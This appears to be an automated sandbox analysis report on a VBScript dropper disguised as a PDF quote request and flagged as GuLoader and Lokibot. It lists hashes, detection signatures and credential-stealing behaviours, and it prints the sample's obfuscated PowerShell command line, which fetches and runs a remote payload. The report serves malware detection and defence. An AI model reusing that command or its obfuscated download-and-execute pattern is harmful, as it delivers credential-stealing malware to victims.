Edit tour
Windows
Analysis Report
Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
Overview
General Information
Sample name: | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | Solicitud de presupuesto 09-30-2024pdf.vbs |
Analysis ID: | 1523153 |
MD5: | 5cc7cf5b0814e2f80bad4c4e85831e96 |
SHA1: | 93ed4011fc57034804feb5bd8ea61c6cf7b30cce |
SHA256: | 12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394 |
Tags: | vbsuser-abuse_ch |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6356 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Solic itud de pr esupuesto 09-30-2024 #U00b7pdf. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7364 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Inartis tical Turk isen Reenf orcement # >;$Holling sworth='Tf felheltene ';<#Niveau delen Ufor djeligheds Initiativ riges Hono urarily Hu sbukkens # >;$Husspil devandet=$ host.Priva teData;If ($Husspild evandet) { $Antoecian s++;}funct ion Dioptr es($unjoin t){$Curvog raph=$Repo larized+$u njoint.Len gth-$Antoe cians;for( $Aftest=5 ;$Aftest - lt $Curvog raph;$Afte st+=6){$In joint+=$un joint[$Aft est];}$Inj oint;}func tion Unhan dled($Gagg ling){ . ($Reprsen terende) ( $Gaggling) ;}$Phorono my=Dioptre s 'nitroMI nt,moBerga zS,nneiU d erlkommalM at iaMac.o / star5Age nd.Korpu0P rfo Sinds (La.ooWRea cci SklenN ringdBaand oRoun.wGru ndsVirke A lpegNUnde TSnoha L,g en1Tekno0 Mass.P.rdo 0Tolkd;Ins uf FertW t winiFldern Murp6 Ske l4Trans;Sy gem astox Fo h6Dal e 4Agers;.hi li Naz erP rotevSu.er :Cog i1S a ak2vask.1P ani. ambu 0Their)sun ny ShelGRi dseeUrfjec FolkekMadd io En,e/Wh eel2Uncli0 Ko ce1Skid e0Prebl0Zo ia1Firma0 benz.1A ko m FimreFFa hreiDecidr DrifteWind fstrudo,g eerxUd.ul/ bo,ca1Optr a2 Li h1Bo rtk.Skaml0 Sejr ';$J ordskorpen s=Dioptres 'Ph noUGy suS Ba ee RaggeR Beh a-FlubbABl owoG Out E DuodeNApo. tTDefin '; $Patienter nes=Dioptr es ' oseth ErhvetMora .tCoccopFi brasNdlgn: Mi ti/ Ely s/Sk.ggdDi u nrBag ji Pre evudfa le Knub.Im .ergStiloo FraaoHtt ngLegeml E ekeSolit. SparpcCrea moSalgsm W ind/ Frdiu Si etcNavn e?Kni aeIn dspxSacchp EctoboSkat ,rK nklt T hon=slendd Obli.oChir kwCrassnLb eselGlasso B gnaTopk odEnang& P rogiUdskid Pluvi=orth i1 SeizETu rk 2Varmt2 TankrhA rc aSTrkniDCu cu.R nelif anrgLImpl aSHerpepru briLRegioT D.scihSupp omUforfHCo rr,EMac r9 Acco.wTygg ejTajikU e rebG GorgQ DyrticGies e-IntertLa gomb Hist9 UnvexaMyma rxHjtekJAr inbLInter ';$Dispowd er=Dioptre s 'Ruteb> Turo ';$Re prsenteren de=Dioptre s 'V aleIT oldkE Varm XEq,al ';$ bytrafik=' Konfektion erings';$P eninvarian t='\Tallow weed.Kli'; Unhandled (Dioptres 'Pneum$Pre digpe tal onio Kompb AboliaSamm elConca:Na tteGor.nge riftmnStr, bd FilaiH ndsgsub et Enchae aur nengrod yb eeFishi=fa e y$C ipse H frnAssu mvOmb g: E xtra ignpP an rptro j d Wis a He lbt Kk,eab ehnd+ onse $HoughPMio sie.ruppnS eminiSilva n RimevAff e aMyxoprS iliciGl.ve aRntgenMad oqtBienn ' );Unhandle d (Dioptre s ' ale$Ur strgSanitl S kkeo pha vbScriba A naclAmt g: EndurSBiny rtFanera F rafnI oedd Nipp s Fre re anadSca ae ryde=M u ke$ Scat PThievaHyp ogtflippiG oneneBeren nQuadrtSet opeViridrE xcavnCylin eErotisUnh u . Ne bsC .rcepcorra lOv rdiFo, est Alko(p a.ro$Ravin DC,regiSep s s SlidpD r,bboSpalt w ,arrdOrg aneBa ysrU nder)Torch ');Unhand led (Diopt res 'Cross [FouriNHal vdeNonvat Duk,.Demul SB,sieeMed iar fllevS